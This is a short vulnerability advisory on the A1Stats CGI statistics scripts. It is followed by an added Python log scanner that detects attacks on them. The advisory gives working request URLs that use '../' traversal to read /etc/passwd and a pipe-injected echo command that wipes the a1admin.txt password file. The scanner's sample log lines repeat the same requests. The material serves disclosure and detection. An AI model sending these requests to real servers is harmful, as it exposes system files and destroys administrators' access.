Drummon Miles A1Stats Directory Traversal Vulnerability

(courtesy <neme-dhc@hushmail.com>):

To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd

www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd

These two will give you /etc/passwd.

www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd

This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.

One can also open a file and wreck its contents.

http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|

will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.
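
The following log check is an added example for defenders, not part of the original advisory or of A1Stats. It flags access-log requests to the a1disp*.cgi scripts whose query string contains ".." path segments or a pipe character, the two request shapes shown above. The log lines, addresses and the benign parameter "stats.log" are constructed sample data, and Common Log Format is an assumption.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any of the A1Stats display scripts named in the advisory, plus its query string.
A1DISP = re.compile(r"/cgi-bin/a1stats/a1disp\d*\.cgi\?(\S*)", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so encoded forms are normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the set of findings for one log line; an empty set means no match."""
    req = REQUEST.search(log_line)
    hit = A1DISP.search(req.group(1)) if req else None
    if not hit:
        return set()
    query = decode_fully(hit.group(1)).replace("\\", "/")
    findings = set()
    if ".." in query.split("/"):   # a ".." path segment climbs out of the data directory
        findings.add("traversal")
    if "|" in query:               # pipe in the file name, as in the a1disp.cgi request above
        findings.add("pipe")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every suspicious line."""
    results = []
    for number, line in enumerate(lines, start=1):
        found = classify(line)
        if found:
            results.append((number, sorted(found)))
    return results

# Constructed sample entries; the first two reuse the request forms from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0" 200 812',
    '192.0.2.10 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| HTTP/1.0" 200 0',
    '192.0.2.12 - - [01/Jan/2001:10:01:00 +0000] "GET /cgi-bin/a1stats/a1disp2.cgi?stats.log HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

A hit on a line with a 200 status means the response should be reviewed, and a "pipe" hit means a1admin.txt should be checked for truncation.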


 

Copyright 2010, SecurityFocus